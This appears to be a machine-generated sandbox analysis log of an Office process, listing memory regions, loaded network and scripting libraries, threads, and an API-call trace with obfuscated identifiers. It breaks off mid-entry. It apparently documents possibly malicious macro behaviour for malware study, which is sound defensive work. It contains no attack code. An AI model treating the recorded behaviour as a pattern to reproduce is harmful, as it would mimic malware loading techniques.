Region: id = 673 start_va = 0x11bd0000 end_va = 0x11bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bd0000" filename = "" Region: id = 674 start_va = 0x11be0000 end_va = 0x11beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011be0000" filename = "" Region: id = 675 start_va = 0x11bf0000 end_va = 0x11bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bf0000" filename = "" Region: id = 676 start_va = 0x11c00000 end_va = 0x11c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c00000" filename = "" Region: id = 677 start_va = 0x11c10000 end_va = 0x11c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 678 start_va = 0x11c20000 end_va = 0x11c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c20000" filename = "" Region: id = 679 start_va = 0x11c30000 end_va = 0x11c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c30000" filename = "" Region: id = 680 start_va = 0x11c40000 end_va = 0x11c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c40000" filename = "" Region: id = 681 start_va = 0x11c50000 end_va = 0x11c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c50000" filename = "" Region: id = 682 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 683 start_va = 0x11bd0000 end_va = 0x11d13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bd0000" filename = "" Region: id = 684 start_va = 0x11d20000 end_va = 0x11e68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d20000" filename = "" Region: id = 685 start_va = 0x11e70000 end_va = 0x11e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e70000" filename = "" Region: id = 686 start_va = 0x11e80000 end_va = 0x11e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 687 start_va = 0x11e90000 end_va = 0x11e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 688 start_va = 0x11e90000 end_va = 0x11e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 689 start_va = 0x11e90000 end_va = 0x11e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 690 start_va = 0x11ea0000 end_va = 0x11eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ea0000" filename = "" Region: id = 691 start_va = 0x11eb0000 end_va = 0x11ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011eb0000" filename = "" Region: id = 692 start_va = 0x11ea0000 end_va = 0x11ea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011ea0000" filename = "" Region: id = 693 start_va = 0x11eb0000 end_va = 0x11ebefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011eb0000" filename = "" Region: id = 694 start_va = 0x11ec0000 end_va = 0x11ecefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ec0000" filename = "" Region: id = 695 start_va = 0x11eb0000 end_va = 0x11eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011eb0000" filename = "" Region: id = 696 start_va = 0x11ed0000 end_va = 0x11f82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ed0000" filename = "" Region: id = 697 start_va = 0x11f90000 end_va = 0x11f9cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f90000" filename = "" Region: id = 698 start_va = 0x11fa0000 end_va = 0x11facfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011fa0000" filename = "" Region: id = 699 start_va = 0x71590000 end_va = 0x7179cfff monitored = 0 entry_point = 0x7167acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 700 start_va = 0x11d20000 end_va = 0x11d20fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 701 start_va = 0x71540000 end_va = 0x71551fff monitored = 0 entry_point = 0x71544510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 702 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 703 start_va = 0x71470000 end_va = 0x7150afff monitored = 0 entry_point = 0x714af7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 704 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 705 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 706 start_va = 0x71410000 end_va = 0x71417fff monitored = 0 entry_point = 0x71411fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 707 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 708 start_va = 0x11d30000 end_va = 0x11d3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011d30000" filename = "" Region: id = 709 start_va = 0x11d40000 end_va = 0x11d42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 710 start_va = 0x11d50000 end_va = 0x11d57fff monitored = 0 entry_point = 0x11d519c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 711 start_va = 0x11d60000 end_va = 0x11d60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 712 start_va = 0x11d50000 end_va = 0x11d57fff monitored = 0 entry_point = 0x11d519c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 713 start_va = 0x11d60000 end_va = 0x11d60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 714 start_va = 0x11d50000 end_va = 0x11d57fff monitored = 0 entry_point = 0x11d519c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 715 start_va = 0x11d60000 end_va = 0x11d60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 716 start_va = 0x11d50000 end_va = 0x11d57fff monitored = 0 entry_point = 0x11d519c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 717 start_va = 0x11d60000 end_va = 0x11d60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 718 start_va = 0x9a40000 end_va = 0x9a4cfff monitored = 0 entry_point = 0x9a47b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 719 start_va = 0x9a40000 end_va = 0x9b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 720 start_va = 0x674b0000 end_va = 0x674eafff monitored = 0 entry_point = 0x674c56aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 721 start_va = 0x9b40000 end_va = 0x9b40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 722 start_va = 0x67490000 end_va = 0x674a2fff monitored = 0 entry_point = 0x674925d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 723 start_va = 0x67470000 end_va = 0x67483fff monitored = 0 entry_point = 0x67473c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 724 start_va = 0x67400000 end_va = 0x67467fff monitored = 0 entry_point = 0x674270a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 725 start_va = 0x66ab0000 end_va = 0x673fafff monitored = 0 entry_point = 0x66b2ec48 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\igx.dll") Region: id = 726 start_va = 0x9b40000 end_va = 0x9b41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009b40000" filename = "" Region: id = 727 start_va = 0x6f860000 end_va = 0x6f867fff monitored = 0 entry_point = 0x6f861920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 728 start_va = 0x6f870000 end_va = 0x6f8b6fff monitored = 0 entry_point = 0x6f8858d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 729 start_va = 0x6f7f0000 end_va = 0x6f853fff monitored = 0 entry_point = 0x6f80afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 730 start_va = 0x9b50000 end_va = 0x9b52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b50000" filename = "" Region: id = 731 start_va = 0x6f7e0000 end_va = 0x6f7effff monitored = 0 entry_point = 0x6f7e4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 732 start_va = 0x6f7c0000 end_va = 0x6f7dffff monitored = 0 entry_point = 0x6f7cd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 733 start_va = 0x6f790000 end_va = 0x6f7bbfff monitored = 0 entry_point = 0x6f7abb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 734 start_va = 0x9b60000 end_va = 0x9b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b60000" filename = "" Region: id = 735 start_va = 0x9b70000 end_va = 0x9b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 736 start_va = 0x9b80000 end_va = 0x9b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 737 start_va = 0x9ba0000 end_va = 0x9ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 738 start_va = 0x9b50000 end_va = 0x9b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b50000" filename = "" Region: id = 739 start_va = 0x9bb0000 end_va = 0x9caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 740 start_va = 0x6f770000 end_va = 0x6f789fff monitored = 0 entry_point = 0x6f77fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 741 start_va = 0x9b90000 end_va = 0x9b99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 742 start_va = 0x68620000 end_va = 0x68729fff monitored = 0 entry_point = 0x68681e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 743 start_va = 0x6f760000 end_va = 0x6f767fff monitored = 0 entry_point = 0x6f761d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 744 start_va = 0x9cb0000 end_va = 0x9cb2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009cb0000" filename = "" Region: id = 745 start_va = 0x9cc0000 end_va = 0x9cc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009cc0000" filename = "" Region: id = 746 start_va = 0x685b0000 end_va = 0x68613fff monitored = 0 entry_point = 0x685b68c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 747 start_va = 0x68520000 end_va = 0x685affff monitored = 0 entry_point = 0x68527345 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 748 start_va = 0x9cb0000 end_va = 0x9e37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 749 start_va = 0x684b0000 end_va = 0x68517fff monitored = 0 entry_point = 0x684bc3f5 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7en.dll") Region: id = 750 start_va = 0x9e40000 end_va = 0x9e40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 751 start_va = 0x68420000 end_va = 0x684a2fff monitored = 0 entry_point = 0x6842fbe4 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\css7data0009.dll") Region: id = 752 start_va = 0x11fb0000 end_va = 0x12137fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 753 start_va = 0x12140000 end_va = 0x1269bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\nl7models0009.dll") Region: id = 754 start_va = 0x9e40000 end_va = 0x9e42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 755 start_va = 0x9e50000 end_va = 0x9e6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 756 start_va = 0x126a0000 end_va = 0x12ea1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 757 start_va = 0x9e70000 end_va = 0x9e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 758 start_va = 0x9e80000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e80000" filename = "" Region: id = 759 start_va = 0x11890000 end_va = 0x1193bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011890000" filename = "" Region: id = 760 start_va = 0x11940000 end_va = 0x11942fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 761 start_va = 0x11950000 end_va = 0x11950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011950000" filename = "" Thread: id = 1 os_tid = 0x12b0 Thread: id = 2 os_tid = 0x1298 Thread: id = 3 os_tid = 0x128c Thread: id = 4 os_tid = 0x1288 Thread: id = 5 os_tid = 0x1284 Thread: id = 6 os_tid = 0x1280 Thread: id = 7 os_tid = 0x1278 Thread: id = 8 os_tid = 0x1274 Thread: id = 9 os_tid = 0x1270 Thread: id = 10 os_tid = 0x126c Thread: id = 11 os_tid = 0x1268 Thread: id = 12 os_tid = 0x1264 Thread: id = 13 os_tid = 0x1260 Thread: id = 14 os_tid = 0x1258 Thread: id = 15 os_tid = 0x1254 [0109.630] DispCallFunc (pvInstance=0xb25c564, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0109.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x693e11d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0x13c4) returned 0xbb8 [0109.635] PeekMessageA (in: lpMsg=0x198060, hWnd=0x30334, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0109.679] NtdllDefWindowProc_A (hWnd=0x30334, Msg=0x1c, wParam=0x0, lParam=0x13a8) returned 0x0 [0109.738] GetActiveWindow () returned 0x0 [0109.740] CRetailMalloc_Alloc () returned 0xcb5e5a0 [0109.740] CRetailMalloc_Realloc () returned 0xc90d060 [0109.743] CRetailMalloc_Alloc () returned 0xc9a2bc0 [0109.743] CRetailMalloc_Realloc () returned 0xcbce050 [0109.743] memcpy (in: _Dst=0x197a00, _Src=0x197a28, _Size=0x4 | out: _Dst=0x197a00) returned 0x197a00 [0109.743] realloc (_Block=0x0, _Size=0x100) returned 0xd015168 [0109.743] memcpy (in: _Dst=0xd015168, _Src=0x197a00, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.743] memcpy (in: _Dst=0x197a10, _Src=0x197a44, _Size=0xc | out: _Dst=0x197a10) returned 0x197a10 [0109.743] realloc (_Block=0x0, _Size=0x60) returned 0xd015270 [0109.743] memcpy (in: _Dst=0xd015270, _Src=0x197a10, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0109.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3e54, cbMultiByte=9, lpWideCharStr=0x11460418, cchWideChar=20 | out: lpWideCharStr="dIh2GUmUW") returned 9 [0109.743] CRetailMalloc_Realloc () returned 0xcb3a118 [0109.744] memcpy (in: _Dst=0xc8b6134, _Src=0x11460414, _Size=0x18 | out: _Dst=0xc8b6134) returned 0xc8b6134 [0109.744] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.744] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.744] memcpy (in: _Dst=0xd015168, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.744] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d3a, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0109.745] CRetailMalloc_Realloc () returned 0xcb3abe0 [0109.745] wcscpy_s (in: _Destination=0xc8b6150, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0109.745] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.745] CRetailMalloc_Realloc () returned 0xc964570 [0109.745] memcpy (in: _Dst=0xd015168, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.745] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.751] memcpy (in: _Dst=0x197904, _Src=0x197978, _Size=0x8 | out: _Dst=0x197904) returned 0x197904 [0109.751] memcpy (in: _Dst=0xcb64330, _Src=0x197904, _Size=0x8 | out: _Dst=0xcb64330) returned 0xcb64330 [0109.752] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3e84, cbMultiByte=10, lpWideCharStr=0x11461618, cchWideChar=22 | out: lpWideCharStr="tgKi2gkQwj") returned 10 [0109.752] memcpy (in: _Dst=0xc8b6160, _Src=0x11461614, _Size=0x1a | out: _Dst=0xc8b6160) returned 0xc8b6160 [0109.752] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.752] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.752] memcpy (in: _Dst=0xd015168, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.752] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d3a, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0109.752] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd01516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a08, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.753] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302c92, cbMultiByte=7, lpWideCharStr=0x197844, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0109.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2e3e, cbMultiByte=7, lpWideCharStr=0x1978a4, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0109.769] CRetailMalloc_Realloc () returned 0xcb273e0 [0109.769] CRetailMalloc_Realloc () returned 0xc877ea8 [0109.769] CRetailMalloc_Realloc () returned 0xc964678 [0109.769] CRetailMalloc_Realloc () returned 0xc856ea0 [0109.769] CRetailMalloc_Realloc () returned 0xcb2f6e0 [0109.770] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.770] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.770] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.770] memcpy (in: _Dst=0xd015170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0109.770] memcpy (in: _Dst=0xd015174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0109.770] memcpy (in: _Dst=0xd015174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0109.770] CRetailMalloc_Realloc () returned 0xc8ccd40 [0109.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3f24, cbMultiByte=9, lpWideCharStr=0x11463be6, cchWideChar=20 | out: lpWideCharStr="sc1j1QJaF") returned 9 [0109.771] memcpy (in: _Dst=0xc8b6180, _Src=0x11463be2, _Size=0x18 | out: _Dst=0xc8b6180) returned 0xc8b6180 [0109.771] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.771] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3f38, cbMultiByte=12, lpWideCharStr=0x11463f9a, cchWideChar=26 | out: lpWideCharStr="JojpEdbSVTKo") returned 12 [0109.771] memcpy (in: _Dst=0xc8b619c, _Src=0x11463f96, _Size=0x1e | out: _Dst=0xc8b619c) returned 0xc8b619c [0109.771] memcpy (in: _Dst=0xd01516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.772] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.773] memcpy (in: _Dst=0xd015170, _Src=0x197894, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0109.773] memcpy (in: _Dst=0xd015170, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0109.773] memcpy (in: 